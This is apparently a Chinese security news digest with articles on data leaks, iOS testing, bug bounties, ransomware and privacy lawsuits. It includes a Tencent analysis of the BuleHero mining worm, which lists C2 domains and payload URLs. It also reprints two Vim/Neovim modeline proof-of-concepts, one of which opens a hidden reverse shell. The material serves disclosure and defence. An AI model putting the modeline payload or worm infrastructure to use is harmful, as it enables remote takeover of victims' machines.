分类: 今日推送

TrueDialog 的数据库泄露数千万条 SMS 短信

TrueDialog是一家为企业和高等教育机构提供业务的SMS提供商,其数据库被曝出泄露了数百万条SMS消息。 数据库中包含的大多数SMS信息是由企业发送给潜在客户的。 TrueDialog 专注于提供几种不同的SMS程序,包括群发短信, 营销短信,紧急警报,教育方案等。 该公司目前与990多家手机运营商合作,拥有超过50亿用户。 vpnMentor表示:“除了私人短信,我们的团队还发现了数以百万计的帐户的用户名、密码、个人验证信息以及客户数据。” “由于没有保护好数据库,TrueDialog损害了美国数百万人的安全和隐私。” 该公司的数据库不受保护,数据以纯文本格式存储,由Microsoft Azure托管,并在Oracle Marketing Cloud上运行。 研究人员称此数据库包含10亿个条目,来自1亿多美国公民,并且根据他们此前的分析,这些数据将近有604 GB。 vpnMentor试图向TrueDialog 报告他们的发现,但他们从未收到回复。该数据库于11月19日被发现,专家于11月28日向TrueDialog提交了报告,并于随后对数据库展开维护。 “此次数据泄露事件将会影响到亿万用户。这些信息可能会被出售给营销商和垃圾邮件推送。” vpnMentor 称,“TrueDialod 竞争对手可以看到其后端工作原理,并且使得他们复制TrueDialog成功的业务模型或由此改进自己的业务模式。”   消息来源:SecurityAffairs, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

iOS 13 最初版本漏洞百出,于是iOS 14 测试流程变了

网易科技讯 11月23日消息,据国外媒体报道,据知情人士透露,在最新版的iPhone和iPad操作系统接连出现一大堆漏洞之后,苹果公司正在改革其软件测试方式。 在与公司软件开发人员举行的最近一次内部“启动”会议上,苹果软件主管克雷格·费德里吉(Craig Federighi)和斯泰西·利希克(Stacey Lysik)等副手们宣布了软件测试方面的变化。新方法要求苹果开发团队确保未来软件更新的测试版,也就是所谓的“每日构建(Daily build)”,在默认情况下禁用未完成或有缺陷的所有功能。然后,测试人员可以通过一个称为Flags的全新内部流程和设置菜单有选择地启用这些特性或功能,从而能够将每个单独添加特性会对系统产生何种影响相互隔离开来。 今年9月,当苹果公司的iOS 13操作系统与iPhone 11系列智能手机同时发布时,iPhone用户和应用程序开发者发现了一连串的软件故障:应用程序崩溃或启动缓慢;手机信号参差不齐;应用程序出现了用户界面错误,比如消息、系统搜索都出现问题,电子邮件也存在加载问题。而通过iCloud共享文件夹以及将音乐流媒体传输到多组AirPods上等新功能要么被推迟,要么仍未实现。毫不客气的说,这次操作系统升级是是苹果历史上最麻烦、最粗糙的。 “iOS 13在继续摧毁我的士气,”知名开发者马尔科·阿蒙德(Marco Arment)在Twitter上写道。“我也是,”购物清单应用AnyList联合创始人杰森·马尔(Jason Marr)说,“在iOS 13上,苹果的表现的确是对开发者和用户的不尊重。” 这些问题表明,iPhone已经变得有多复杂,而且用户很容易对一家以软硬件顺畅整合而著称的公司感到失望。对苹果公司来说,每年跟随最新款iPhone定时发布软件更新,是增加系统新功能、防止用户转向主要竞争对手Android的关键途径。更新后的操作系统还为开发者提供了更多的应用程序开发工具,从而为苹果的应用商店带来了更多收入。 苹果发言人特鲁迪·穆勒(Trudy Muller)拒绝置评。 新的开发过程将有助于提高早期内部iOS操作系统版本的可用性,或者用苹果的话说,(不同功能)更加“易于相处”。在iOS 14开发之前,有些团队每天都会添加一些还没有经过充分测试的功能,而其他团队则每周都会对现有功能进行修改。“每天的开发过程就像一整份食谱,但很多厨师都在添加配料,”一位了解开发过程的人士表示。 测试软件在开发不同阶段的变化是如此之多,以至于这些设备常常变得难以运行。由于这个原因,一些“测试人员会在一团糟的情况下将系统跑上几天,所以他们根本不会真正清楚哪些功能会对系统产生何种作用。”该人士说。在这种情况下,由于苹果工程师很难测试出操作系统对许多新添加功能的反应,从而导致iOS 13频频出现某些问题,因此也无法达到测试目标。 苹果公司内部测试是所谓的“白手套”测试,用1到100的等级来衡量和排名其软件整体质量。有问题的软件版本得分可能在60分左右,而更稳定的软件可能在80分以上。iOS 13的得分低于之前更完善的iOS 12操作系统。在开发过程中,苹果团队还为软件产品的功能特性分别设置了绿色、黄色和红色的代码,以显示这种功能特性在开发过程中的质量。相应的优先级从0到5,其中0是关键问题,5是次要问题,用于确定单个软件错误的严重性。 新策略已经被应用到代号为“Azul”的iOS 14系统开发中,该系统将于明年发布。苹果还考虑将iOS 14的一些功能推迟到2021年发布,在公司内部这一更新被称为“Azul +1”,也可能会以iOS 15公开发布,这也让公司有更多时间关注操作系统性能。不过,熟悉苹果计划的人士表示,预计iOS 14在新功能的广度上将与iOS 13不相上下。 测试策略的转移将适用于所有苹果的操作系统,包括iPadOS、watchOS、macOS和tvOS。最新的Mac电脑操作系统macOS Catalina也出现了一些问题,比如与许多应用程序不兼容,邮件中缺少信息。一些运行基于iOS操作系统的HomePod音箱在最近一次iOS 13更新后无法工作,导致苹果暂时停止升级。另一方面,最新的苹果电视和苹果手表系统更新则相对顺利。 苹果公司的高管们希望,从长远来看,全面改革后的测试方法将提高公司软件质量。但这并不是苹果工程师第一次听到管理层这么说。 去年,苹果曾推迟了iOS 12的几项功能发布,其中包括对CarPlay和iPad主屏幕的重新设计,专注于提高可靠性和整体性能。在2018年1月的一次全体会议上,费德里吉表示,公司对新功能的重视程度过高,应该优先向消费者提供他们想要的质量和稳定性。 随后,苹果成立了所谓的“老虎团队”来解决iOS特定部分的性能问题。该公司从整个软件部门调派工程师,专注于加快应用程序启动时间、改善网络连接和延长电池寿命等任务。当iOS 12操作系统于2018年秋季发布时,运行相当稳定,在头两个月内只进行了两次更新。 这种成功没有延续到今年的操作系统升级。iOS 13的最初版本漏洞百出,以至于苹果不得不匆忙发布了几个补丁。在iOS 13发布的头两个月里,已经进行了8次更新,是自2012年费德里吉接管苹果iOS软件工程部门以来最多的一次。该公司目前正在测试另一个新版本iOS 13.3,这本是要在明年春天进行的后续工作。 今年6月份苹果召开了2019年度全球开发者大会。大约在此一个月前,该公司的软件工程师就开始意识到,当时在公司内部被称为Yukon的iOS 13表现不如之前的版本。一些参与这个项目的人说系统开发是一个“烂摊子”。 今年8月,苹果工程师们意识到,几周后与新iPhone一起发布的iOS 13.0根本无法达到质量标准,于是决定放弃对其进行修补,专注于改进后续的第一次更新版本iOS 13.1。苹果私下里认为iOS 13.1是“真正的公开发布版本”,其质量水平与iOS 12相当。公司预计只有铁杆苹果粉丝才会在手机上安装iOS 13.0操作系统。 9月24日苹果发布了更新的iOS 13.1,这比既定时间提前了一周,也压缩了iOS 13.0作为苹果旗舰操作系统发布的时间。新iPhone与苹果软件紧密集成,因此从技术角度讲,不可能推出搭载iOS 12操作系统的iPhone 11系列智能手机。由于新款手机发布时iOS 13.1还没能及时准备好,苹果唯一的选择就是发布iOS 13.0,并尽快让所有人更新到iOS 13.1。 虽然iOS 13出现的问题确实让iPhone用户感到不安,但更新速度还是相当快。据苹果称,截至10月中旬,半数苹果设备用户都在运行iOS 13。这一升级速度仍远远领先于谷歌的Android。 iOS 13.1发布后,苹果的软件工程部门迅速转向iOS 13.2,其质量目标是优于iOS 12。这次更新后的抱怨比iOS 13操作系统的前几次更新都要少,但却仍有一个错误,系统会在不应该关闭的情况下关闭后台的应用程序。 苹果应用程序资深开发者史蒂夫·特劳顿-史密斯(Steve Troughton-Smith)在Twitter上写道:“iOS 13给人的感觉就像是一个超级混乱的版本,自iOS 8以来我们从未见过如此糟糕的情况。”   (稿源:网易科技,封面源自网络)

谷歌增加 Android 安全奖励计划奖金 最高将达 150 万美元

据外媒Neowin报道,谷歌的Android安全奖励计划(Android Security Rewards Program)自2015年开始实施,并已向发现移动操作系统漏洞的安全研究人员支付了数百万美元。如今,该公司正在扩大研究人员可获得的奖励,最引人注目的是一项新的奖励,其价值可能高达150万美元。 当然,这种奖励是针对特别具有挑战性的漏洞利用。谷歌表示将向研究人员支付100万美元,他们可以执行“具有持久性的全链远程代码执行漏洞,从而破坏Pixel设备上的Titan M安全元件”。Titan M芯片是在Pixel 3上首次引入的,根据来自Gartner的数据,该设备被认为具有比其他任何经过测试的设备更高的安全性。如果在Android的“特定开发人员预览版”上执行此漏洞,则赏金可以增加50%,这将使总奖励达到150万美元。 谷歌表示,在过去的12个月中,其总共支付了约150万美元的奖励,其中包括多项奖金。在此期间,最高的奖金达161337美元,参与研究的100多名研究人员的平均奖金是每个发现3800美元。 除了这一非常高的奖励等级之外,谷歌还推出了其他新等级,这些等级的奖励比以往更高。这些漏洞包括涉及数据泄露和锁屏绕过的漏洞利用,奖励最高可达到50万美元。   (稿源:cnBeta,封面源自网络)

收到这样的邮件请立即删除:勒索软件伪装成 Windows 更新诱骗用户点击

如果您收到一封声称来自微软的电子邮件,并要求安装所谓的关键更新,那么请立即删除这封邮件。安全公司Trustwave近日发现了新的恶意程序活动踪迹,它们利用电子邮件方式进行传播,伪装成为Windows更新让设备感染Cyborg勒索软件。 这是一种非常典型的攻击方式,首先给潜在目标发送电子邮件,邮件中会包含虚假的Windows更新。该更新似乎使用的是JPG文件扩展名,实际上是一个可执行文件,一旦启动,便从GitHub下载其他有效负载。 rustwave解释称:“根据我们的调查,受感染的设备会从一个名为misterbtc2020的GitHub账号中下载名为bitcoingenerator.exe的文件,该账号在几天前还处于活跃状态,目前已经被删除。该文件包含了btcgenerator存储库。就像附件一样,这是.NET编译的恶意软件,也就是Cyborg勒索软件。” 勒索软件感染设备后,用户文件将被加密并重命名为使用“777”扩展名。此时,用户文件被锁定,勒索软件将文本文档放置在桌面上,以向受害者提供有关如何获取解密密钥的指令。 在勒索消息中写道:“不用担心,你可以赎回所有文件!您可以发送一个加密文件[sic],我们将免费对其进行解密。您必须按照以下步骤来解密文件:将500美元的比特币发送到钱包[钱包号码],然后向我们的邮箱发送通知。” Trustwave警告说:“任何拥有该Builder的人都可以创建和分发Cyborg勒索软件。攻击者可以使用其他不同的主题来诱骗用户点击,并以不同的形式来逃避电子邮件网关的审查。攻击者可以使用已知的勒索软件扩展名,来误导受感染的用户识别出这种勒索软件。” 不用说,最简单的安全保护方法是避免打开电子邮件并下载附件。更新安全软件还可以帮助检测受感染的文件,并阻止勒索软件感染您的设备。   (稿源:cnBeta,封面源自网络。)

皮尤:大部分美国人认为不收集个人数据是不可能的事情

据外媒报道,皮尤研究中心的一项新研究显示,对于许多美国人来说,数据收集现在可能已经被视为是其日常生活的一部分。据统计,超60%的美国成年人表示他们认为政府或公司不收集他们的数据是不可能的。 资料图 报告显示,81%的成年认为广泛收集数据的风险大于益处。不过大多数美国人表示,他们担心自己的数据可能会被公司和政府使用。而超80%的受访者表示,他们觉得对自己的数据缺乏控制。超一半的人则表示,他们对数据收集和使用知之甚少。 25%接受调查的成年人认为,他们几乎每天都在同意一项隐私政策。而在表示同意隐私政策之前他们当中阅读了相关内容的人的数量则更少。 对于许多公司来说,收集数据是为了帮助建立客户档案进而可以根据他们的习惯展示更好的销售行为。然而现在越来越多的入侵让大多数成年人感到自己已越来越控制自己的个人数据。   (稿源:cnbeta,封面源自网络。)

BuleHero 4.0 挖矿蠕虫真疯狂,超十种方法攻击企业,已有3万电脑中招

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/kHF-xcGiQTUKTlleOxfHdg 一、背景 腾讯安全御见威胁情报中心检测到挖矿蠕虫病毒BuleHero于11月11日升级到4.0版。在此次更新中,BuleHero引入了多种新漏洞的使用,包括2019年9月20日杭州警方公布的“PHPStudy“后门事件中涉及的模块漏洞利用。 该团伙善于学习和使用各类Web服务器组件漏洞。包括以前用到的Tomcat任意文件上传漏洞、Apache Struts2远程代码执行漏洞、Weblogic反序列化任意代码执行漏洞,又引入了Drupal远程代码执行漏洞、Apache Solr 远程命令执行漏洞、PHPStudy后门利用,使得其攻击方法增加到十个之多。   BuleHero在进入目标系统后,首先通过命令下载downlaod.exe,然后downlaod.exe下载主模块swpuhostd.exe,swpuhostd.exe释放密码抓取工具,端口扫描工具,永恒之蓝攻击工具进行扫描和攻击,同时依次进行行多种web服务组件的探测和漏洞利用攻击,并在中招电脑下载挖矿木马和远程控制木马。   根据腾讯安全御见威胁情报中心数据,BuleHero挖矿蠕虫病毒目前感染超过3万台电脑,影响最严重地区为广东,北京,江苏,山东等地,影响较严重的行业分别为互联网,科技服务,贸易服务业。 二、详细分析 攻击和传播 攻击模块swpuhostd.exe将自身注册为服务“mekbctynn”,然后释放密码抓取工具mimikatz,扫描工具,永恒之蓝攻击工具到C:\Windows\tqibchipg\目录下。 vfshost.exe为mimikatz为密码抓取工具,可以从内存中获取电脑登录时使用的账号密码明文信息,BuleHero使用抓取到的密码进行横向传播。 tcnuzgeci.exe和trctukche.exe都是端口扫描工具,扫描ip.txt中指定的IP范围,探测139/445/3389/8983等端口,将结果保存至Result.txt中,并在后续的漏洞攻击过程中使用。 而UnattendGC目录下依然存放的是永恒之蓝攻击包文件,目前使用的漏洞攻击工具包括永恒之蓝,双脉冲星,永恒浪漫和永恒冠军。 攻击模块swpuhostd.exe执行以下漏洞攻击过程 Tomcat PUT方式任意文件上传漏洞(CVE-2017-12615),首先通过漏洞上传名为FxCodeShell.jsp的webshell,利用该webshell执行传入的命令下载木马。 Apache Struts2远程代码执行漏洞(CVE-2017-5638),Struts使用的Jakarta解析文件上传请求包不当,当远程攻击者构造恶意的Content-Type,可能导致远程命令执行,漏洞影响范围:Struts 2.3.5 – Struts 2.3.31,Struts 2.5 –Struts 2.5.10。 Weblogic远程代码执行的反序列化漏洞CVE-2018-2628,漏洞利用了T3协议的缺陷实现了Java虚拟机的RMI:远程方法调用(RemoteMethod Invocation),能够在本地虚拟机上调用远端代码,攻击者利用此漏洞远程执行任意代码。 Thinkphp V5漏洞(CNVD-2018-24942),该漏洞是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由的情况下可远程执行代码。攻击者利用该漏洞,可在未经授权的情况下,对目标网站进行远程命令执行攻击。 Weblogic反序列化远程代码执行漏洞(CVE-2019-2725),由于weblogic中wls9-async组件的WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。 Drupal远程代码执行漏洞CVE-2018-7600,Drupal对Form API(FAPI)AJAX请求的输入环境不够,导致攻击者可以将恶意负载注入内部表单结构,从而执行任意代码。 Apache Solr 远程命令执行漏洞CVE-2019-0193,此漏洞存在于可选模块DataImportHandler中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参数来设置,由于DIH配置可以包含脚本,导致攻击者可利用dataConfig参数构造恶意请求,实现远程代码执行。 PHP的php_xmlrpc.dll模块中的隐藏后门利用,影响版本:phpstudy 2016(php5.4/5.2) phpstudy 2018(php5.4/5.2)。该后门利用事件今年9月由杭州公安在《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》中披露,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭黑客篡改并植入“后门”,后门位于程序包自带的PHP的php_xmlrpc.dll模块中,攻击者构造并提交附带恶意代码的请求包,可执行任意命令。攻击模块swpuhostd.exe执行爆破过程 IPC$远程爆破连接,爆破登录成功后在目标机器利用Psexec工具或者利用WMIC执行远程命令。 在攻击模块的代码中还包含3389(RDP服务)端口扫描行为,虽然目前未根据扫描结果进行下一步动作,但由于该团伙十分活跃,推测其可能在后续的更新中添加RDP漏洞(BlueKeep)CVE-2019-0708的攻击代码。腾讯安全威胁情报中心监测数据表明,仍有相当比例的Windows电脑未修复CVE-2019-0708漏洞,该漏洞存在蠕虫病毒利用风险。 挖矿 BuleHero病毒攻击成功,会将挖矿木马释放到Windows目录下C:\Windows\Temp\geazqmbhl\hvkeey.exe,木马采用XMRig编译,挖矿使用矿池为mx.oops.best:80,mi.oops.best:443。 远程控制 释放远控木马到C:\Windows\SysWOW64\rmnlik.exe目录下,上线连接地址 ox.mygoodluck.best:12000。 三、安全建议 因该病毒利用大量已知高危漏洞攻击入侵,并最终通过远程控制木马完全控制中毒电脑组建僵尸网络,危害极大。腾讯安全专家建议企业重点防范,积极采取以下措施,修复安全漏洞,强化网络安全。   1.服务器暂时关闭不必要的端口(如135、139、445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html   2.下载并更新Windows系统补丁,及时修复永恒之蓝系列漏洞。   XP、WindowsServer2003、win8等系统访问:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598   Win7、win8.1、Windows Server 2008、Windows 10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx   3.定期对服务器进行加固,尽早修复服务器文档提及的相关组件安全漏洞,安装服务器端的安全软件;   4.服务器使用高强度密码,切勿使用弱口令,防止被黑客暴力破解;   5.使用腾讯御点终端安全管理系统拦截可能的病毒攻击(下载地址:https://s.tencent.com/product/yd/index.html); 6.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) IOCs IP 185.147.34.136 185.147.34.106 172.104.91.191 139.162.2.123   Md5 ecb3266326d77741815ecebb18ee951a 398fb3fed9be2941f3548a5d0d4b862c 6ef68c9b73b1beee2efabaf6dfe11051 f62a9a4720da8f4afb457569465c775c f89544ecbf66e93c2821625861ae8821 b1956fe89e3d032be3a06820c63f95a6   Domain fk.0xbdairolkoie.space zik.fxxxxxxk.me xs.0x0x0x0x0.club rs.s1s1s1s1s.fun qb.1c1c1c1c.best jz.1c1c1c1c.xyz ik.s1s1s1s1s.host ff.s1s1s1s1s.site eq.s1s1s1s1s.asia cu.s1s1s1s1s.pw ce.1c1c1c1c.club wiu.fxxxxxxk.me wc.fuckingmy.life upa2.hognoob.se upa1.hognoob.se uio.hognoob.se uio.heroherohero.info rp.oiwcvbnc2e.stream rp.666.stream qie.fxxxxxxk.me q1a.hognoob.se pxx.hognoob.se pxi.hognoob.se ox.mygoodluck.best oo.mygoodluck.best noilwut0vv.club mx.oops.best mi.oops.best li.bulehero2019.club heroherohero.info haq.hognoob.se fxxk.noilwut0vv.club fid.hognoob.se dw.fuckingmy.life cb.fuckingmy.life bk.oiwcvbnc2e.stream bk.kingminer.club bk.heroherohero.in aic.fxxxxxxk.me a88.heroherohero.info a88.bulehero.in a47.bulehero.in a46.bulehero.in a45.bulehero.in   URL http[:]//fk.0xbdairolkoie.space/download.exe http[:]//fk.0xbdairolkoie.space/ swpuhostd.exe http[:]//xs.0x0x0x0x0.club:63145/cfg.ini http[:]//qb.1c1c1c1c.best:63145/cfg.ini http[:]//ce.1c1c1c1c.club:63145/cfg.ini http[:]//jz.1c1c1c1c.xyz:63145/cfg.ini http[:]//eq.s1s1s1s1s.asia:63145/cfg.ini http[:]//rs.s1s1s1s1s.fun:63145/cfg.ini http[:]//ik.s1s1s1s1s.host:63145/cfg.ini http[:]//cu.s1s1s1s1s.pw:63145/cfg.ini http[:]//ff.s1s1s1s1s.site:63145/cfg.ini   参考链接: https://www.freebuf.com/column/180544.html https://www.freebuf.com/column/181604.html https://www.freebuf.com/column/197762.html https://www.freebuf.com/column/204343.html

FTC 结束 YouTube 侵犯儿童隐私调查 谷歌或罚款 100 万美元

美国联邦贸易委员会(FTC)已经加大罚款力度,重拳打击隐私泄漏。据悉FTC最新目标是谷歌的YouTube,相关调查显示这家全球最大视频网站非法跟踪未成年人如何使用该平台的相关数据。援引华盛顿邮报报道,FTC的一项调查结果显示谷歌无法为使用YouTube的儿童提供应有的保护,而且会收集他们的数据。这种行为违反了儿童在线隐私保护法案(COPPA),该法案禁止对13岁及以下儿童进行数据收集和地理位置定位数据。 虽然这个报道得到了两位消息人士的证实,但是谷歌和FTC均拒绝发表评论。而接下来的阶段就是交由美国司法部同意罚款和其他相关条件,不过通常情况下美国司法部不会反对FTC的裁决。 在报道中称谷歌已经和FTC达成和解,预计Google将为此支付数百万美元的罚款,但其与FTC和解的确切金额和条款尚不清楚。这项和解协议达成之际,科技巨头们正面临着来自政府和用户的更多审查,因为人们对他们如何收集和保护用户数据的担忧与日俱增。FTC和司法部最近分割了亚马逊、苹果、Facebook以及谷歌的监管权力,这可能会导致对这些公司权力的更严格审查。 FTC担心的问题之一是,网站、视频游戏和其他服务没有明确将目标对准儿童,但仍然吸引了大量未成年用户。这些公司还抱怨说,法律不够明确。 COPPA禁止公司在大多数情况下收集儿童数据或通过个性化广告瞄准他们,但这项法律只适用于针对儿童的网站或应用程序,或“实际知道”用户不满13岁的网站或应用程序。   (稿源:cnBeta,封面源自网络。)

苹果发布静默更新:移除受 Zoom 安全漏洞影响的Web服务器

援引外媒 TechCrunch 报道,在曝光视频会议应用 Zoom 存在严重的零日漏洞–可以在 Mac 上使用隐藏的 Web 服务器打开视频通话之后,苹果决定亲自介入并已采取相应的措施方案。苹果发布了一个静默更新,意味着无需用户参与的情况下在 Mac 设备上移除这些网页服务器,能够防止所有已经安装 Zoom 软件的 Safari 用户进一步受到感染。     尽管 Zoom 在昨天已经发布了紧急修复补丁来移除这些网页服务器,不过显然苹果担心用户并不会主动更新,或者没有意识到打补丁的重要性,从而忽略了这个补丁更新。苹果的介入无疑提供了更妥善的安全解决方案,不仅是因为很多用户可能在暂时不会打开 Zoom,而且很多用户还卸载了这款应用程序。 不过需要注意的是,如果没有安装 Zoom 的紧急更新就执行卸载程序,这些网页服务器依然会留在用户计算机设备上,因此 Zoom 无法通过更新的应用程序卸载它。这就意味着唯一可靠和简单的方法就是苹果的介入。苹果报告称本次调整并不会影响 Zoom 应用在 Mac 设备上的功能。 Zoom 发言人 Priscilla McCarthy 告诉 TechCrunch:“我们很高兴与Apple合作测试此更新。我们希望今天解决 Web 服务器问题。我们感谢用户的耐心,因为我们会继续努力解决他们的问题。 本周早些时候,安全研究员 Jonathan Leitschuh 公开披露了在 Mac 电脑上 Zoom 视频会议应用中出现的一个严重零日漏洞。他已经证明,任何网站都可以在安装了 Zoom 应用的 Mac 电脑上打开视频通话。 这在一定程度上是可行的,因为 Zoom 应用在 Mac 电脑上安装了一个网络服务器用于接收普通浏览器不会接收的请求。事实上,即便卸载了 Zoom, 网络服务器仍会持续存在,并且可以在不需要用户干预的情况下重新安装 Zoom。   (稿源:cnBeta,封面源自网络。)

Vim 与 Neovim 曝出任意代码执行漏洞

安全研究人员发现 Vim 与 Neovim 中存在一个任意执行漏洞,允许黑客在用户打开恶意文本文件时控制计算机。漏洞影响 Vim 8.1.1365 与 Neovim 0.3.6 之前的所有版本。 该漏洞存在于编辑器的 modeline(模式行)功能,此功能允许用户在文本文件的开头或结尾设置窗口尺寸和其它自定义选项,它在一个被操作系统封锁的沙箱中运行,并且可用命令也被限制,但是研究人员 Arminius 发现了绕过该安全保护的方法。 目前漏洞已经被编号为 CVE-2019-12735,Arminius 也释出了两个概念验证。 第一个是直接利用该漏洞使系统执行`uname -a`命令: :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" 另一个利用方式更加深入,一旦用户打开文件就自动启动反向 shell。为了隐藏攻击,文件将在打开时立即重写。此外,当使用 cat 输出内容时,攻击还使用终端转义序列隐藏 modeline: \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n 目前补丁也已经释出: Vim patch 8.1.1365 Neovim patch (released in v0.3.6) 更具体的细节见: https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md.   (稿源:开源中国,封面源自网络。)

因 Alexa 经常收集儿童用户录音 亚马逊遭到起诉

据报道外媒,任何打开 YouTube 的人都能找到无数儿童在与 Alexa 开心交谈的视频。Alexa 是亚马逊推出的一款数字语音助手智能扬声器产品。在这款产品给用户带来便利、乐趣的同时,许多人却在担心由其带来的隐私问题。 日前,这家公司就因这个问题遇到了两起联邦诉讼。诉讼称 Alexa 经常在未经儿童或其父母同意的情况下对数百万名儿童进行录音和收集声纹。 获悉,其中一起诉讼于周二在西雅图联邦法院发起,原告为一名来自马萨诸塞州的 10 岁女孩。就在同一天,洛杉矶法院也接到了一起类似的诉讼,原告则为一名 8 岁的男孩。 诉讼的核心在于加利福尼亚州和华盛顿都被称为“两方同意州”。在这两个州中,如果想要对某人进行录音商家则必须要征得双方的同意才行。然而,西雅图的诉讼称,“亚马逊从未警告未注册用户,它正在为他们的 Alexa 互动创建持续的语音记录,更不用说征得他们的同意了。” 针对这两起诉讼案,亚马逊方面拒绝置评。   (稿源:cnBeta,封面源自网络。)